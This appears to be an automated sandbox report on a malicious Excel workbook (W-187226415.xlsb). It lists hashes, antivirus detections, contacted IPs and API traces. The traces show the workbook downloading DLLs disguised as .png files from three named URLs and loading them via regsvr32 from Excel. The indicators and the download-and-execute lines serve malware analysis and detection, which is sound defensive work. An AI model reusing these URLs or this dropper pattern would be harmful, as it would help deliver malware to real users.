Summary | ZeroBOX

W-187226415.xlsb

Malicious Library Excel Binary Workbook file format(xlsb)
Category Machine Started Completed
FILE s1_win7_x6402 April 14, 2022, 11:18 a.m. April 14, 2022, 11:21 a.m.
Size 1.0MB
Type Microsoft Excel 2007+
MD5 bed901b1480a2af9b76dc875722ec03a
SHA256 2a426033914e399f72f5e82ba4c1da2ef251cd70ef0ab4027822b81129a78a09
CRC32 8C83145C
ssdeep 24576:O9vBKAnpis3QXPH5sjl+opcMrAm9vBKAnpis3Q+9vBKAnpis3QSVLFUN:C5KA65VSrX5KAV5KAVNFK
Yara
  • xlsb - Excel Binary Workbook file format detection
  • Malicious_Library_Zero - Malicious_Library

IP Address Status Action
162.241.62.76 Active Moloch
164.124.101.2 Active Moloch
192.185.17.132 Active Moloch
31.22.4.117 Active Moloch

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2380
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b5e1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2380
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b5e3000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 820
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b5e1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 820
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b5e3000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2564
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b5e1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2564
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b5e3000
process_handle: 0xffffffff
1 0 0
file C:\Uduw\ehxw2.dll
file C:\Uduw\ehxw1.dll
file C:\Uduw\ehxw3.dll
Time & API Arguments Status Return Repeated

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x000003f0
filepath: C:\Users\test22\AppData\Local\Temp\~$W-187226415.xlsb
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$W-187226415.xlsb
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0
cmdline regsvr32 C:\Uduw\ehxw2.dll
cmdline regsvr32 C:\Uduw\ehxw1.dll
cmdline regsvr32 C:\Uduw\ehxw3.dll
Sangfor Malware.Generic-XLM.Save.ma35
Cyren XF/Agent.BF.gen!Eldorado
Symantec Scr.MalMacro!gen3
ESET-NOD32 multiple detections
Avast VBS:Malware-gen
Kaspersky HEUR:Trojan.Script.Generic
Alibaba Trojan:Office/Generic.f4b01eba
Rising Downloader.Agent/XLM!1.DD40 (CLASSIC)
McAfee-GW-Edition Artemis
GData Macro.Trojan-Downloader.Agent.BDH
Tencent Mac.Trojan.Macro40.Pkqz
Fortinet MSExcel/Agent.AC!tr.dldr
AVG VBS:Malware-gen
Time & API Arguments Status Return Repeated

URLDownloadToFileW

url: https://maramaabroo.com/XGLCPZf6et/Cvnhfn.png
stack_pivoted: 0
filepath_r: C:\Uduw\ehxw1.dll
filepath: C:\Uduw\ehxw1.dll
2148270085 0

URLDownloadToFileW

url: https://natalespatagonia.cl/w2X7dAxp/Cvnhfn.png
stack_pivoted: 0
filepath_r: C:\Uduw\ehxw2.dll
filepath: C:\Uduw\ehxw2.dll
2148270085 0

URLDownloadToFileW

url: https://camarajocaclaudino.pb.gov.br/5jajRnhLV0/Cvnhfn.png
stack_pivoted: 0
filepath_r: C:\Uduw\ehxw3.dll
filepath: C:\Uduw\ehxw3.dll
2148270085 0
parent_process excel.exe martian_process regsvr32 C:\Uduw\ehxw2.dll
parent_process excel.exe martian_process regsvr32 C:\Uduw\ehxw1.dll
parent_process excel.exe martian_process regsvr32 C:\Uduw\ehxw3.dll